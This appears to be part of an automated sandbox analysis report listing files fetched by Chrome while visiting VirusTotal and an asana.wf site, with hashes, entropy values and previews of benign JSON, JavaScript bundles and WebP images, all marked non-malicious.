                                                                                                                                                                                                                    SHA-512:B1EA3400186FCFE43A9DFFCA955A13A0E5DF6C0A77EAE47129447F1FB9110B618B786969ABADF975D3AE36A3CB4B19F1CD1483232F3024F3BA5B10BC902D1018
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:{. "error": {. "code": "RecaptchaRequiredError",. "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header". }.}
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):108484
                                                                                                                                                                                                                    Entropy (8bit):3.3859724555698616
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:768:sbqCfCMSM03bkCfCAWbkCnCA8oaJbACDCIG:sbqCrD03bkCHWbkCvYbACLG
                                                                                                                                                                                                                    MD5:CF2519294E4EEAB1313599035D5AB299
                                                                                                                                                                                                                    SHA1:4488B1ED39205AE81DABF204917693802C96989E
                                                                                                                                                                                                                    SHA-256:E86509B0AEF2074D70C5E9C58CAE0C9EFD1647E653476E8B18553F208BD0C531
                                                                                                                                                                                                                    SHA-512:23491FA37A81BE67B46EFC1ADF54963B8758F63688EC67AE8098BD2F82CBA1FA4490D08774C0417A85251242850AD4A2B95C93E2089F96B46548569338E87814
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/contacted_ips?limit=10&cursor=eyJsaW1pdCI6IDEwLCAib2Zmc2V0IjogMTB9
                                                                                                                                                                                                                    Preview:{. "data": [. {. "id": "239.255.255.250",. "type": "ip_address",. "links": {. "self": "https://www.virustotal.com/ui/ip_addresses/239.255.255.250". },. "attributes": {. "last_analysis_stats": {. "malicious": 4,. "suspicious": 1,. "undetected": 22,. "harmless": 63,. "timeout": 0. },. "reputation": -122,. "last_analysis_date": 1714053569,. "last_modification_date": 1714074957,. "total_votes": {. "harmless": 8,. "malicious": 38. },. "whois_date": 1713920517,. "whois": "NetRange: 224.0.0.0 - 239.255.255.255\nCIDR: 224.0.0.0/4\nNetName: MCAST-NET\nNetHandle: NET-224-0-0-0-1\nParent: ()\nNetType: IANA Special Use\nOriginAS: \nOrganization: Internet A
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1211)
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):360294
                                                                                                                                                                                                                    Entropy (8bit):5.549381869072948
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:6144:vkI+ZDozC5CzD4bU2bUZT8zu1NOu3VKDKNDOZURFKRf9XV8auvtK5JM12w:xZz/BFKl9XV8lv26z
                                                                                                                                                                                                                    MD5:8BE4E7D54F1992708D7F2BF33F0630F0
                                                                                                                                                                                                                    SHA1:2DFBD7F47527A0065838A5568B703FC29B531809
                                                                                                                                                                                                                    SHA-256:767648150AF120190E343A7BD2357675D896D34037D33FB4BF7F5F548764C712
                                                                                                                                                                                                                    SHA-512:6BFBCD3D36EA91587849692A39DB50C5ED0ACEE327A0464C4F280B93578ACFBB55CC07B95C543C9DB48793F148D337B589920FB18CCC805A318DAD85F821EDB5
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.gstatic.com/dialogflow-console/fast/df-messenger/prod/v1/df-messenger.js
                                                                                                                                                                                                                    Preview:/**.Copyright 2024 Google LLC.This Software is made available under Section 3 of the General Service Terms of the Google Cloud Platform Service Specific Terms at https://cloud.google.com/terms/service-terms, except that Customer may additionally embed and/or distribute this Software to Customer End Users in connection with Customer Applications integrating with the Dialogflow Service..*/'use strict';var DF_M;function DF_Maa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var DF_Mba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function DF_Mca(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var DF_Ma=DF_Mca(this);.function DF_Mb(a,b){if(b)a:{var c
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):2012
                                                                                                                                                                                                                    Entropy (8bit):7.853780472010002
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:48:GiQQmcYIG8Ra+7W9EwnxDOsaYrpfm4dLpE2h/XE+23Z/s:GiNxY3q7twxDCafzLHv2C
                                                                                                                                                                                                                    MD5:B4D544D181177A03CCA806584730D0AD
                                                                                                                                                                                                                    SHA1:21958883BEF840C5F096DC760E943CB39CC3F975
                                                                                                                                                                                                                    SHA-256:2CF12A7ADEECD24C1A110FBD89942471E7C89A8750D8FC236D48A14A79B27550
                                                                                                                                                                                                                    SHA-512:E130338C50BAB970A2EB116BE7FA05F37D5106D9FEAA3F39C6BB7E3ABFA0DEBA8A8EE48F44A18765907C853E90580FF1566E1903CBD49778B17F8B2B0A47ED30
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:RIFF....WEBPVP8X........+..O..ALPH..........9...M.6...1g.}V.m.f.f.6.J.Ejw....3......<.1....6....q....m.H.m.E..Fw.".#.S.*7o...S.z.....R.f.H..)D.b..Q..<.......Gy.......dxM.Ta.):1M.d|R.0.\X)E....)./...".`xJ......D.J....F. .].8Bg[..E..y....}f...3n:...Q..R[.wI.g...".......0#HqR......A:g.XCQw..fk.....Ge.!v.J.-.N....6.`...k..:j/...."|....j......!$i..|.h.k.yJu..*nT.;.4...N.W..Qs.)...\F%.[Q^C./.h..1.d.q$..I..T'...|..t...1..I.o;..4.<......C...j4.".n.-.U.PY5j.Qw..$.s}+Hu.7..E..7..j&.L.x... .^......CT..`.g%.;..M$/...d:'..s..;.ER^OQ..dh0E].X.i..`..^...I..P=#...J.#).u..:3..H.Y..&..s..[.7..5..._...-..#1...aS#.S..1G..K...[..%....5+.D.W...D.}\..`..YPZ5....cn3p%.C.R....H.KI.9...-?.X.....r.........0U' ..$.t=.JuM'...@.WH|..vnH,....@.g.....u.d.&...u.N.|...>G}.....Z^9^..Q...~.&9......lJ.._....O..1!$/....z.jh^D.N.SR..B.!A.>.``S%1{/............iU.y.w...$....}.S...K.>.h.....Ts.^...2..9.#.].!X..3.^..38...m=...k.tl...,n.$>..qe..k..\i.i..ps..).~(L..&.S.C..g...n..9...B..
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 234400
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):90147
                                                                                                                                                                                                                    Entropy (8bit):7.996578838134338
                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                    SSDEEP:1536:THz+F8+3P231LCuREim/pPdvlMChAvYG5IMoBpG+TlGy4+yYvHPUp:TT+ycu3NCQEL/pPd+CJG5IJnTlGbPYvU
                                                                                                                                                                                                                    MD5:7D99EBE425BBF403E2C9D64523AB3E2A
                                                                                                                                                                                                                    SHA1:91380F1B4008DA337AA9601669327E98DBAE5065
                                                                                                                                                                                                                    SHA-256:EF22514852018332C33CCB1ED6A5171F8E542445D3EC5BEA1A67470C4133CCCA
                                                                                                                                                                                                                    SHA-512:D56A02A0CBAB97A50E8A4D07B17A6117DD0979151918FE3D562F3AB3DD6971BACBFD6EDB9E99D1D1D0DC85F0F742C253258D28E5F6D70CAF7A03B6FBE4DCE89C
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/27604.cc72e42e5e25c872f1f7.js
                                                                                                                                                                                                                    Preview:.............r.....*$.V...IPRK.XD..G['...)}..P$`..].H.EF|.;v.~.......O1....2.*.$...;..PUy\...u..e>;..g....z..|.......t.~.........z9i...?.r......t...y.J.Vz.i.x=....y3o}j....rULG.F.<+.(...|..b.....*j_.r<.N.."_....|=.m.....v.'.E.?...1m...V..'..0...'...l5.M..;...eO.....xQ4._..k.T$.t..8X.....j._..N7M.;..8.....M...h...k..i.&.... .....o>.1..b]..d..i.n....-..._...~..__.;z...;.|.*.G.g..V.J.y..f4M..M=..1.$3 :...k...t...|.k}b.|.A.L3[.%.OrWz.JF.1....K..7G-7.O...7oN...O+Y-....h..e+9.V.Iot}]....@..Ys..-o.....N..%..........u.Z.1.:>X......[.1+jHv..q...4....tp.........t?..$p..&.(S...z.Nw...(o.%......l.j..Vr.N.....I....M....1..W..ir.A~.>...ip.>..wr.>t...0...Z.QX..Q.d.$A....F.q...E.Jn@.^..E.}.oY.p.i/.!.....f.......]{^U0.K.-....^.6Q......(..9.q.O..:.E......e. .u.-....^o.@...7.c.A........c./.8Lb.<... .......J+..8.8.At..~|..G.3a.'..{...$P.YD=.N'..........?.`S......iD+'...yj....e:n...$...(<T..A$.....e.<...@$.i0l.W+.;?...6.......,..+..8.....nVD|y.-.h
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):18372
                                                                                                                                                                                                                    Entropy (8bit):4.225637456765651
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:QGXkqiLTok47JhUWjh/QbUoefof2fKuJWCD+aXakbkQczs8uu1cbQoZG07vW31nM:Zj1MLsu1S7WLqkj1OsZV3IRaU
                                                                                                                                                                                                                    MD5:83080E28438F9CA2D9CEAF37695F0FD7
                                                                                                                                                                                                                    SHA1:2B879A5B4095C79CBBA020071CDC56D5C3D14D4A
                                                                                                                                                                                                                    SHA-256:2B586C7CE68FCD41892638FC4548FE756C59D59212F121469A75BCCA5184A63D
                                                                                                                                                                                                                    SHA-512:4827C8F5F3B1192A27AFAC609C80D904113D86B6B133B828945735EE216DD989764E14FD7A411BC47BA7C30F676A3E6D0D5F9A39ABC9D6D3993CF73414B8C318
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviour_mbc_trees
                                                                                                                                                                                                                    Preview:{. "data": {. "CAPE Sandbox": {. "objectives": [. {. "id": "OB0007",. "name": "Discovery",. "link": "https://github.com/MBCProject/mbc-markdown/blob/main/discovery/README.md",. "description": "Behaviors that enable malware to gain knowledge about the system and network.",. "behaviors": [. {. "id": "E1082",. "name": "System Information Discovery",. "link": "https://github.com/MBCProject/mbc-markdown/blob/main/discovery/system-information-discovery.md",. "description": "Malware may attempt to get detailed information about the system. This can include details about the operating system, hardware configurations, installed software, system uptime, and other system-level details.\n\nSee ATT&CK: **System Information Discovery ([T1082]
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 19512
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):7077
                                                                                                                                                                                                                    Entropy (8bit):7.971506843987442
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:PQnz/9KEcwxgEZsy+sihRzcb7K62EUaSq:PQnz/9Jcmsy+zdc78aSq
                                                                                                                                                                                                                    MD5:BF49994E0A2E96ED2D35EBFAC3EF15C1
                                                                                                                                                                                                                    SHA1:970DA8894C54AA6F74506CAE44124A363896E468
                                                                                                                                                                                                                    SHA-256:7B54DC310126FC10186103FCAEB39E62A7C448E47E5BA3FC3A2B77E32350FA11
                                                                                                                                                                                                                    SHA-512:C5A40D3111318E3C4984EFE89C63DCC9DFA95BA51F654DD6CE618287363213AA85884D42BFFCBC63C10FC60EA208EE51B70462084287B5CC3E46251EF609DA41
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/9013.46aa6f2a33218f146fc9.js
                                                                                                                                                                                                                    Preview:...........\kw.F......$. .@$%R")J.q.....H....I@.Ab..\..ch...U..4....=.i.D..Q]]]....v...H.3.K..........b.=<V..._.A.M?S......Z....Q.w......9.^^..m..n.L.7.Aa....\.F.[.cwx6p.....h.u........q3<......wF..>."z...^:.TTV..z*..bB.W.x..U.grX7wx..C..|..YU......C%Wg7.8[..t:.o..O........)...W..^..eX$.*/l..8.$...ig:.^V"..;...{r..,......"...LU..w"R.J..hB.T(v..$..v'..9v9.......Lm.Ei..8.......~p.O..gR.j]d..ON...5.H.I&.,U?7.N.<+++.n.y>O.8..C..5n..T.(P..N>r.<....8....-....<..~f*[^..4L....s%...r...z..Z..sQ.C...).X....z...Z$..%e0KE4}....EQ..NDI..y.O;.mY.U.ZXYh.K*J.b..n.2...{...9...`.V.E.L.;......_..(y...i.....k..........N...W.U.~./..;.2X.64..4S.L.f.)....^..R...*.eP.XE..g.7...}+H.y.z!.'..c...c.!........sM.._.\....<..l-,..B.i.*..........3w.:..0.....1..g.....{..k.Z..ZJ,.^..E...VE.......]..g..p..X.t......I.S.y.}.x.A.%AV.D.j..4...f..z...]..#.R.E..9(.e.......h}.hv.%.......e]$;.5..r.d...N:...l..._m..&1.jSl..W..de...K.....N.j..<OE.m...*....^....'...|..db.......O..2...h...O..
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (7711)
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):264813
                                                                                                                                                                                                                    Entropy (8bit):5.616102473964613
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3072:ScfAQaf5qZ3fhO+zJqcf8pG1LceF2/ea8LR9Wk9ARFaQjSTnXDL9btIMjvZCQ5cw:vAQX5NzJyYLceF+hYTnXP9RIMTB5Y0iy
                                                                                                                                                                                                                    MD5:7A2171F91B154D2F523C6278E8FE83F1
                                                                                                                                                                                                                    SHA1:0A2E5CA9042FAC41C01E685FA88C65F8369D30A5
                                                                                                                                                                                                                    SHA-256:D02A0346D79B1D77B9BCD53DE9A937A522559D2453B378F3AAE0E2240B95D53D
                                                                                                                                                                                                                    SHA-512:2F319C07C4ADDE840250E4384F03AB9315DA3917676DA891856E2666A22A2E6A186D5BE43CFD0601EEE8A93A9039EED653AC87F4D0F64648A4047CF6E661CFE6
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.googletagmanager.com/gtag/js?id=G-BLNDV9X2JR&l=dataLayer&cx=c
                                                                                                                                                                                                                    Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"vtp_signal":0,"function":"__c","vtp_value":0},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0},{"vtp_signal":0,"function":"__c","vtp_value":0},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_dma","priority":11,"vtp_delegationMode":"ON","vtp_dmaDefault":"DENIED","tag_id":14},{"function":"__ogt_1p_data_v2","priority":11,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):26502
                                                                                                                                                                                                                    Entropy (8bit):7.984063981678213
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:768:iHbESCYxe4iS0vzoe7CeySKkBvuOmZ/rTsTi:E4S0v8eZySnmZTTs
                                                                                                                                                                                                                    MD5:B34B9328BBF3C7847A31301D96C6787C
                                                                                                                                                                                                                    SHA1:3BEB295BB3EC3C65AF9D2A505F426BE6B8A35853
                                                                                                                                                                                                                    SHA-256:673121687F6BFBAB4A75FEBAC64C6B3D42E6B288960044E5FB9810B1F747BD28
                                                                                                                                                                                                                    SHA-512:A1D737CACCA92257E40F3C45A43DD320A097F204D0DC9C4C1036822882B08B2A0186E80C97347A5250C544F71DEFD4C153F79A22ECC01DB898DC3147F34DD8B0
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://asana.wf/img/home24-resources-thumbnail.webp
                                                                                                                                                                                                                    Preview:RIFF~g..WEBPVP8X......../../..ALPH......U..6..!\(B..A$.....,.2.....s..;_.cF...KO..1..q..[..t..q.^...8..+.c...h..2....F...yT.\..21z.k..r..iT."..b..F...C.X.b1.o..zT.>.e..........................................................................................................................................................................................................................................}/G..jq.Y-..X..Z...-b*.9E.^).........L...~*......B../]z}.s....6.....Y.2.).=..=.a.>?...VP8 .e...{...*0.0.>.@.L%.&*.0:.P..in.9v*.W.u..*....jNQ.#/`......Ji.w...............k.$=.|..O.?..i|`....}....o].|>E...)..\..k./.........@.....R._`....=f.....e...._......7...o......t.......?.....6Rl.'.....\(p...`.>....B.C..........*...,l..(O..s.P.P.ce&.B}?.....)6....\.T..8X.I.P.O...p....M.....?...8...o..z..o@a~RQ|...,..p.DX..j.".)y6.>.VY.i.5{/w..)m.=...C......A......\.q.....M...@...J..o....J.....k...p....B`.B_.m.}..b...IEB..-&<....`w..#._..D...q...z..J..1.>....<.Q.R.O_......^".Qr1
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):102
                                                                                                                                                                                                                    Entropy (8bit):4.8013557344442175
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:JSbMqSL1cdXWKQKVnIwN4wECWaee:PLKdXNQKVnDoCL
                                                                                                                                                                                                                    MD5:284B36421A1CF446F32CB8F7987B1091
                                                                                                                                                                                                                    SHA1:EB14D6298C9DA3FB26D75B54C087EA2DF9F3F05F
                                                                                                                                                                                                                    SHA-256:94AB2BE973685680D0BE9C08D4E1A7465F3C09053CF631126BD33F49CC2F939B
                                                                                                                                                                                                                    SHA-512:093F3F5624DE2E43E43EB06036107FF3260237F9E47E1F86FDFBA7C7036522187A9B47B291F5443C566658A8EF555E5033C7F2AC0C9F4FA8EB69EB8E2540B372
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://recaptcha.net/recaptcha/api2/webworker.js?hl=en&v=V6_85qpc2Xf2sbe3xTnRte7m
                                                                                                                                                                                                                    Preview:importScripts('https://www.gstatic.com/recaptcha/releases/V6_85qpc2Xf2sbe3xTnRte7m/recaptcha__en.js');
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 7386
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):3132
                                                                                                                                                                                                                    Entropy (8bit):7.933133410513748
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:48:XgI1QP9jgOOLcyXkgSIExAOQb/45AGolsr5Kr4W86Ij979ENQycL0H/zwKnYMF:h+G/bZoAOQb45k8F1xyx/zCa
                                                                                                                                                                                                                    MD5:2DA97AE86D705651135C4784F8CE2A73
                                                                                                                                                                                                                    SHA1:1FFBA95F5C04BA34CBDDD80D8372144A332B4AA2
                                                                                                                                                                                                                    SHA-256:EA2767251F8D93F31B2708B0E14DD492BE1A49BD4488DC3137483B1C6421D518
                                                                                                                                                                                                                    SHA-512:E587220C435BEE3145CA30FDCB0AA3C53A436F39CDDA671F1000AD7E0247BBDFFED1CC8A65FA058A7E88BF0372F06BFD13F1B1CC4F15669BFC81FD316E7B564A
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/
                                                                                                                                                                                                                    Preview:...........Y.w.F..+..z... ..-.8n.M.8..I.....0Hc..2#Y.....$.b.N...<.3s..}p.$.\.T..49=Q...d..N3...D.'",X.O..,..g-jJ...91V.c.i.~}.....|&...>..-$).>je.V..Hj..*.XJ[.I.4....Z.k.xN.-.KE.<.).g.+2. .'.G.Y.uXPH.P..qa.......,lQ.c}*e.F....=.|.PI&)...v....x...W.._.z..../u3.sR`...Q.e.....yA[.....-."~kBg3.=S.4..zD$yI.....F_[..sV..$jq}<.......Q{.<:j...].xl.4OHH[....:...Fcc)...SR.*..L......fP.X...D.B.B.I.u..W..R...3z.s..&.e...#:g!...3e.Kg.%B..k.V2...gPvyC.._R.E$..=..=iWO.;.h.m(.....b."..J.z{2cm<.X......g1....|}.\@..V:..".Gz.WV^......[>...g..!.%Ty.$.....2.....L.;...V....o..l...C..np...o........={.\....2..o...O>\....t.....}...7....4Ygr.#O..tm.0....'y^z...p.......!.d..j#@"...)....H.{.....5.E....Q..X.....k.<.."...4.u..gPG.ue.S.E..KZ(..;.5cVyBh.g.'.M......DPS..J}..,...t.n..@A7.y.i.'..D.Mi..Wi...~........Kr.G/...Pmp..E.s}...d.Ti..(.)....X. ...G@/.l..4W:p...t-.r;#..u.......-...%.X...>..]x.p.....;...7...&4DT.*..v..[...>.......5r...|..v..|C...!5.%,.....u.e.MP...#.1...e
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 34464
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):10831
                                                                                                                                                                                                                    Entropy (8bit):7.982591075449953
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:vpRBhuVxsipaXLJOPu41xPHkvzOEBxPN7UNml47T2NHPf:vp+xsiYkPhNWyEBj7Usi7T2Nvf
                                                                                                                                                                                                                    MD5:0E7BB7B941811BDA04EF49203329A6C9
                                                                                                                                                                                                                    SHA1:B8723BEA7881470ED0E7ADEED443FB9F726B0664
                                                                                                                                                                                                                    SHA-256:351E422F6DFA4CD4595D33BA43D8C63560AC0734BBCD69B80A664C0F140E3D4C
                                                                                                                                                                                                                    SHA-512:BA111200B20E7F43337DAE2D404CD38C3A7C945E797F7CFCDC96DCE47C6AC6CD7223C6F2B2982A7294B98764ED7817CEC570B55CC165D06A3663CCCA5E718A25
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/65237.b9cde27c36caed16055e.js
                                                                                                                                                                                                                    Preview:...........]}{.6...?..&Y.B."...q.7..9...nv[.R.m..D-I.em}.... AI~I.....>.X ..`0.....ea|.\..E0..?].?.....Y...;.....X.b.Mk.......V....r;.#..~m.....4....<H..j.v...~6:.e'...x..5......S{.....M...|.G.\..3..h..g.Y8.3'..g....ns/..q..~...oG....9......d....7a6N.E..5.w.....pU...E.......m.>5....I8N. .../....|.a.b..3B<.s.n......0..Z.......im..h.imn.....8.(.d....5L.|......t.....$<....lg.WL.?..,3..<.O2#s...U...........I..l.2...)(l..4.dA3...'...u....[......|.b.W.DT.... ......8...Vk...g.i..xh...gk...C...i0?.Q.......QNw-..!x..A..$...0B.'~.r.[..L.l....sP.6./..e.'3Q6..i_O.<.....h.e...e.R.....`..b.6...\..}|.X...)c....8..&=7..E7.....wD..J./.`.N..].1.D......n......U......(....Ls`f....d.`[.S>Th.i.L.}......P..!..7McO.......Q..yTR..g\....E.s...DB.......s...|..)0...c..A..4..%2....(.:..,......X..pR...B...vM.bp..6?[Y'.....=.M...-..o.."M.......7..$q..7.....e.^Y5SL....|..7-...W.+..e...J.......eT...$H'u.{ke.zn...v:r....m.r...g..........].io.w<....j5.~._...m..gb/.}e..S...
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):181
                                                                                                                                                                                                                    Entropy (8bit):4.328146837827697
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:TDFFF0KBojEV5hPKZHFFFizXO8HOAWRRkPFzA5KiAFVTCWI1A5HFNhBUliAn:TD/uaoBZAbO8HvWRRe3ePilNXUwAn
                                                                                                                                                                                                                    MD5:478EBD50127DA8FF67F45FF32B1FADC9
                                                                                                                                                                                                                    SHA1:1AD153784C05C6BE30B95D8835CEDD9D5183FFA8
                                                                                                                                                                                                                    SHA-256:EE402D01A943841EAFC309DF31EA958A981844B5C7A4A833164A22036B624C42
                                                                                                                                                                                                                    SHA-512:B1EA3400186FCFE43A9DFFCA955A13A0E5DF6C0A77EAE47129447F1FB9110B618B786969ABADF975D3AE36A3CB4B19F1CD1483232F3024F3BA5B10BC902D1018
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:{. "error": {. "code": "RecaptchaRequiredError",. "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header". }.}
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):7486
                                                                                                                                                                                                                    Entropy (8bit):7.956209252485213
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:Qx9NmCns2IwXtTBbPEBAZLAYTEpWIcNM5:QcC9TlPQAZLzQWIgq
                                                                                                                                                                                                                    MD5:6FE6B4545ADFAD659ECFA1DB1428CB64
                                                                                                                                                                                                                    SHA1:3EE1BB924C803E993FD7C5275328F031E73A8D51
                                                                                                                                                                                                                    SHA-256:154FE8571E314E242A5829BEF2C2CFEF5E22EF71A1524E86EAECA0DB24EA878D
                                                                                                                                                                                                                    SHA-512:05A0E6B3C51AF7FF9F4130FF5D2384A6F4B842DC84281147481B2D8CE90F6F4A8E35AD7BFA085357514C1F364B8F6A07FB3540059855FAAC676CDEF58E6DB3F5
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://asana.wf/img/HOME24-web-hero-forrester-2x-en-US.webp
                                                                                                                                                                                                                    Preview:RIFF6...WEBPVP8X......../.....ALPH.....g`.m......>""..:.j.m....H..v....f..T.`.e.......tG....mn.d....'b..`.x.c.E...Y!s......qV...%..WOL*$S..]QytE..+..].......?............?............?............?............?............?............?....]q...W...b...=....W...y...]R.r.YA.#.....pV.h..mj.a....7...nVj...VP8 .........*0. .>.H.L%.&.!2.....in.v..8.7Z<v.........=..z.......u.....YZ..../.?..M.O...4?.|..3.+........O.....~..o..........7...w..~..zZ.d".-~@UE.2.X.. *....._..Qv.V......fB+....T].!..k..........U.l.E`Z.....d".-~@UE.2.X.. *....._..Qv.V......fB+....T].!..k..........U.l.E`Z.....d".-~@UE.2.X.. *....._..Qv.V......fB+....T]..+.CG...J..!..Py.r...9j#5..U.l.E`Z......y.....kTD...o....%.fB+....T].!......3[...}o....L.&.h..F..gGL...U.^_./.%+..2Y./F.L...*.wo!....Pq:..].!..k.......}.t....vO.V_9..,+,.S.:...Q..#bK0...V~.6s..+.Jg..c........9.Mk.)Z...M0h...3....`Z.....d".,....M..{....:.R...u.)..F..).'..Rk...%L.`............U.l.E`C..i..b..?4N\.6S.QE..........2....
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 17631
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):5808
                                                                                                                                                                                                                    Entropy (8bit):7.964058467678669
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:96:xeU27+oCue8K+NiSOfh7jkNeGFoH/t1QZ0uO7Zw/E1:X2xCfUNiS+h74NeGFoHVWZ+/1
                                                                                                                                                                                                                    MD5:6F257A67A90F5C54D1B87ED35CF7B2FC
                                                                                                                                                                                                                    SHA1:B6974B237AF1B8E40C0C4EA37174E861537D7981
                                                                                                                                                                                                                    SHA-256:E1671630891C5E5C8EF51A861C120AAC29B474344535CBB606440906EFF2EA1C
